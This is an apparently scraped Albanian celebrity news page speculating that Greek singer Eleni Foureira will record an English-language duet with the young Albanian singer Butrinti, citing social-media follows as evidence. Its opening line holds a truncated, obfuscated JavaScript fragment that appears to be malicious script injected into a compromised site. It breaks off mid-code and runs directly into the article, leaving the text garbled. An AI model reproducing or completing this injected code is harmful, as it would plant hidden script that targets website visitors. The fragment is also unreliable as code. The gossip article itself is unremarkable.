;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Beyonce’ e Greqisë në duet me një shqiptar ?!

By

Ngjitjen në karrierë e nisi duke mohuar origjinën shqiptare.

Në terrenin përplot racizëm e prirje etnocentrike, Eleni Foureira e kishte parë të udhës që të niste në këtë mënyrë rrugëtimin e saj artistik në shtetin helen.

Por, duket se rrjedha e ngjarjeve po ec në atë mënyrë saqë tani super ylli në repertorin e saj mund të shtoj shumë shpejt edhe një duet me një shqiptar.

Dhe besoni apo jo, ky me gjasë është Butrinti, djaloshi që depërtoi fuqishëm në tregun tonë muzikor.

Dyshimet lindën në emisionin NIN të Klan Kosova kur Butrinti deklaroi se brenda një muaji do vij në bashkëpunim me një këngëtare shumë të famshme.

Përpos që tha se krijimi muzikor do jetë në gjuhën angleze, 19 vjeçari nuk deshi të jap asnjë detaj tjetër.

Se Eleni Foureira mund të jetë kjo këngëtare provat janë të shumta. Së pari, ylli që jeton në Greqi është në treshen e ngushtë të artisteve që Butrinti ndjek në Instagram (përfshirë Elvana Gjatën dhe Dhurata Dorën).

Njejtë vepron edhe Eleni, që poashtu e ndjek me ‘follow’ artistin shqiptar.

Së dyti, ‘Kanga jote’ nga Butrinti është i vetmi krijim muzikor shqiptar që Eleni e ka shpërndarë në llogarinë e saj në Facebook, duke dëshmuar kështu me gjasë një parapërgatitje të fansave për emrin me të cilin do bashkëpunoj brenda pak kohësh.

Intrigues është fakti se si kanë arritur të shtrijnë komunikimin me njëri-tjetrin Eleni dhe Butrinti por ajo që dihet sigurt është se ky duet do të shërbej një mundësi e artë për afirmim në Shqipëri për Foureirën dhe Greqi për Butrintin shkruan Prive.al.

Me një këngë në gjuhën angleze, s’do çuditeshim aspak nëse suksesi do të marrë përmasa ndërkombëtare.

 

Artikuj të ngjashëm